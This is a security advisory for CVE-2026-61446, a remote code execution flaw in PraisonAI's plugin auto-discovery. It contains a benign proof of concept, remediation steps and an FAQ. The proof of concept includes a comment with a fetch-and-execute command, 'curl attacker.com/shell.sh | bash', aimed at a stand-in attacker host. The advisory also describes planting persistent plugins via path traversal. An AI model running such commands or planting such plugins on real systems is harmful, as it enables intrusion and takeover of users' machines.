CVE-2026-61446: PraisonAI before 1.6.78 Remote Code Execution via Plugin Auto-Discovery
Summary The plugin manager loads and executes arbitrary .py files from .praisonai/plugins/ directories (both project-level and user home) via importlib.util.specfromfilelocation() + execmodule() with zero code signing, integrity verification, or sandboxing. Any attacker who can write a file to the plugins directory (via path traversal, supply chain attack, or compromised dependency) achieves arbitrary code execution when the plugin system initializes.
Details
src/praisonai-agents/praisonaiagents/plugins/manager.py (lines 163-196):
python def loadpluginfile(self, filepath: Path) -> Optional[Plugin]: modulename = f"praisonplugin{filepath.stem}{id(filepath)}" spec = importlib.util.specfromfilelocation(modulename, filepath) module = importlib.util.modulefromspec(spec) sys.modules[modulename] = module spec.loader.execmodule(module) # Executes arbitrary Python code
if hasattr(module, "createplugin"): return module.createplugin() # Calls arbitrary function
src/praisonai-agents/praisonaiagents/plugins/discovery.py (lines 38-39):
python Auto-discovery paths: 1. Project: ./.praisonai/plugins/ 2. User: ~/.praisonai/plugins/
No code signing, hash verification, or sandboxing is applied. The only validation is checking for a Plugin Name field in the file's docstring header.
PoC
python from praisonaiagents.plugins.discovery import loadplugin import tempfile, os
Create a "malicious" plugin testdir = tempfile.mkdtemp() pluginfile = os.path.join(testdir, 'evil.py') with open(pluginfile, 'w') as f: f.write('"""\nPlugin Name: Evil Plugin\nDescription: test\nVersion: 1.0.0\n"""\n' 'PROOF = "CODEEXECUTEDATIMPORTTIME"\n' '# In a real attack: os.system("curl attacker.com/shell.sh | bash")\n' 'def createplugin():\n return {"name": "evil"}\n')
Load it result = loadplugin(pluginfile) print(f"Result: {result}") # {'name': 'Evil Plugin', ...}
Verify code executed import sys for name, mod in sys.modules.items(): if 'evil' in name: print(f"EXPLOIT CONFIRMED: {mod.PROOF}") # "CODEEXECUTEDATIMPORTTIME"
Tested result: Plugin file was loaded via execmodule(), and the PROOF variable confirmed code execution at import time.
Impact
- Arbitrary code execution: Any .py file in the plugins directory is executed with full Python access - No user interaction required: Plugins are auto-discovered and loaded at framework initialization - Persistence: A planted plugin survives restarts and executes every time the framework starts - Attack chain: Combine with path traversal (writefile tool) to plant the plugin remotely
Other sources
PraisonAI (praisonaiagents) before 1.6.78 contains a remote code execution vulnerability in the plugin manager, which loads and executes arbitrary Python (.py) files from project-level and user-home .praisonai/plugins/ directories using importlib specfromfilelocation() and execmodule() without code signing, integrity verification, or sandboxing. An attacker who can write a malicious .py file to a plugin directory (for example via path traversal, a supply chain attack, or a compromised dependency) achieves arbitrary code execution when the plugin system initializes.
— NVD
Affected Software
Remediation
Recommended actions to resolve this vulnerability, in priority order.
- Upgrade
Upgrade
pip/praisonaiagentsto a version that resolves this vulnerability.Fixed in 1.6.78 - Upgrade
Upgrade
PraisonAI (praisonaiagents)to a version that resolves this vulnerability.Fixed in 1.6.78
Event History
Frequently Asked Questions
What is the severity of CVE-2026-61446?
The severity of CVE-2026-61446 is high, rated at 8.6.
How do I fix CVE-2026-61446?
You can fix CVE-2026-61446 by upgrading PraisonAI to version 1.6.78 or later.
What type of vulnerability is CVE-2026-61446?
CVE-2026-61446 is a remote code execution vulnerability.
What is the impact of CVE-2026-61446?
The impact of CVE-2026-61446 allows attackers to execute arbitrary Python code on the affected system.
Which software is affected by CVE-2026-61446?
CVE-2026-61446 affects PraisonAI praisonaiagents versions before 1.6.78.